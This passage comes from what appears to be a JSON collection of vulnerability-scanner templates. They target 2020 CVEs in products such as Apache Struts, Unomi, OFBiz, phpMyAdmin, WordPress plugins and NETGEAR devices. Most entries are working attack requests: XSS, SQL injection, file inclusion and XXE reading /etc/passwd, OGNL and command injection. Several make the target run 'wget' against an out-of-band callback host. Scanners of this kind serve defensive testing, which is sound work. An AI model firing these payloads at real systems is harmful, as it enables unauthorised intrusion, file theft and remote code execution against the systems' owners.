{{randkey}}\n\n<clipermission></clipermission>\n"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}],"extractors":[{"type":"regex","name":"randkey","regex":["(?m)[0-9]{3,10}\\.[0-9]+"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11441","info":{"name":"phpMyAdmin 5.0.2 - CRLF Injection","severity":"medium"},"requests":[{"raw":["GET /index.php?route=/ HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?route=/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nset_session={{session}}&pma_username=%0D%0Atest:crlfinjection=1%0D%0A&pma_password=%0D%0Atest:crlfinjection=1%0D%0A&server=1&route=%2F&lang=en&token={{token}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["^test:crlfinjection=1$"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"session","group":1,"regex":["name=\"set_session\" value=\"([a-z0-9]+)\""],"internal":true},{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"token\" value=\"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2020-13942","info":{"name":"Apache Unomi <1.5.2 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/context.json"],"body":"{\n  \"filters\": [\n    {\n      \"id\": \"{{id}}\",\n      \"filters\": [\n        {\n          \"condition\": {\n            \"parameterValues\": {\n              \"nuclei\": \"script::Runtime.getRuntime().exec('id')\"\n            },\n            \"type\": \"profilePropertyCondition\"\n          }\n        }\n      ]\n    }\n  ],\n  \"sessionId\": \"nuclei\"\n}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json","context-profile-id"],"condition":"and"},{"type":"regex","part":"body","regex":["(profile|session)(Id|Properties|Segments)","[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19625","info":{"name":"Gridx 1.3 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["6ca86c2c17047c14437f55c42c801c10"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26258","info":{"name":"XStream <1.4.15 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n        <dataHandler>\n          <dataSource class='javax.activation.URLDataSource'>\n            <url>http://{{interactsh-url}}/internal/:</url>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <string>test</string>\n  </entry>\n</map>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Java"]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29227","info":{"name":"Car Rental Management System 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=/etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1943","info":{"name":"Apache OFBiz <=16.11.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/control/stream?contentId=%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10189","info":{"name":"ManageEngine Desktop Central Java Deserialization","severity":"critical"},"requests":[{"raw":["POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{generate_java_gadget(\"commons-collections3.1\",\"wget http://{{interactsh-url}}\",\"raw\")}}\n"],"matchers":[{"type":"status","status":[200],"internal":true}]},{"raw":["GET /cewolf/?img=%5Clogger.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-25495","info":{"name":"Xinuo Openserver 5/6 - Cross-Site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>hello</h1><script>alert(/{{randstr}}/)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24701","info":{"name":"OX Appsuite - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request with action all","<script>alert(document.domain);</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11450","info":{"name":"MicroStrategy Web 10.4 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyWS/happyaxis.jsp"],"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Axis2 Happiness Page","Examining webapp configuration","Essential Components"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15895","info":{"name":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/info.php?RESULT=\",msgArray);alert(document.domain);//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[";alert(document.domain);","DIR-816L"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-36112","info":{"name":"CSE Bookstore 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["get book price failed! You have an error in your SQL syntax","Can't retrieve data You have an error in your SQL syntax"],"condition":"or"}]}]},{"id":"CVE-2020-19360","info":{"name":"FHEM 6.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19515","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain) />","qdPM"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9054","info":{"name":"Zyxel NAS Firmware 5.21- Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9496","info":{"name":"Apache OFBiz 17.12.03 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["faultString","No such service [ProjectDiscovery]","methodResponse"],"condition":"and"},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-18268","info":{"name":"Z-Blog <=1.5.2 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /zb_system/cmd.php?act=verify HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 81\nContent-Type: application/x-www-form-urlencoded\nConnection: close\n\nbtnPost=Log+In&username={{username}}&password={{md5(\"{{password}}\")}}&savedate=0\n","GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16846","info":{"name":"SaltStack <=3002 - Shell Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/run"],"body":"token=1337&client=ssh&tgt=*&fun=a&roster={{roaster}}&ssh_priv={{priv}}","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"CherryPy\\/([0-9.]+)\", header) || regex(\"CherryPy ([0-9.]+)\", body)"]},{"type":"word","part":"body","words":["An unexpected error occurred"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-11930","info":{"name":"WordPress GTranslate <2.8.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/does_not_exist\"%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E<img%20src=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","uri-translation"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-27986","info":{"name":"SonarQube - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/settings/values"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email.smtp_host.secured","email.smtp_password.secured","email.smtp_port.secured","email.smtp_username.secured"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11991","info":{"name":"Apache Cocoon 2.1.12 - XML Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/v2/api/product/manger/getInfo"],"body":"<!--?xml version=\"1.0\" ?-->\n<!DOCTYPE replace [<!ENTITY ent SYSTEM \"file:///etc/passwd\"> ]>\n<userInfo>\n<firstName>John</firstName>\n<lastName>&ent;</lastName>\n</userInfo>\n","headers":{"Content-Type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26948","info":{"name":"Emby Server Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Name or service not known"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-12259","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /configDevice.php?rid=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-28429","info":{"name":"geojson2kml - Command Injection","severity":"critical"},"requests":[{"raw":["POST /convert HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"fileName\": \"& echo \\\"{{randstr}}\\\" > {{filename}}.txt && ls\",\n  \"geoJsonData\": {\n    \"type\": \"FeatureCollection\",\n    \"features\": [\n      {\n        \"type\": \"Feature\",\n        \"geometry\": {\n          \"type\": \"Point\",\n          \"coordinates\": [102.0, 0.5]\n        },\n        \"properties\": {\n          \"prop0\": \"value0\"\n        }\n      }\n    ]\n  }\n}\n","GET /file/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22840","info":{"name":"b2evolution CMS <6.11.6 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2020-12447","info":{"name":"Onkyo TX-NR585 Web Interface - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26876","info":{"name":"WordPress WP Courses Plugin Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/lesson/1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["rest_post_invalid_id","\"(guid|title|content|excerpt)\":{\"rendered\":"],"condition":"or"},{"type":"status","status":[200,404],"condition":"or"}]}]},{"id":"CVE-2020-19295","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/weibo/topic/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","JEESNS"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35848","info":{"name":"Agentejo Cockpit <0.12.0 - NoSQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/newpassword"],"body":"{\n  \"token\": {\n    \"$func\": \"var_dump\"\n  }\n}\n","headers":{"Content-Type":"application/json"},"matchers":[{"type":"regex","part":"body","regex":["string\\([0-9]{1,3}\\)(\\s)?\"rp-([a-f0-9-]+)\""]}]}]},{"id":"CVE-2020-5775","info":{"name":"Canvas LMS v2020-07-29 - Blind Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-24902","info":{"name":"Quixplorer <=2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>&srt=yes","My Download"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8115","info":{"name":"Revive Adserver <=5.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\""],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)window\\.location\\.replace\\(\".*alert\\(1337\\)"]},{"type":"word","part":"body","words":["window.location.href.indexOf"],"negative":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-23697","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?id=dashboard HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}&login_submit=Log+In\n","GET /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/index.php?id=pages&action=add_page HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15\n","GET /{{string}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"><script>alert(document.domain)</script>\") && contains(body_4, \"Monstra\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35987","info":{"name":"Rukovoditel <= 2.7.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=entities/&action=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" 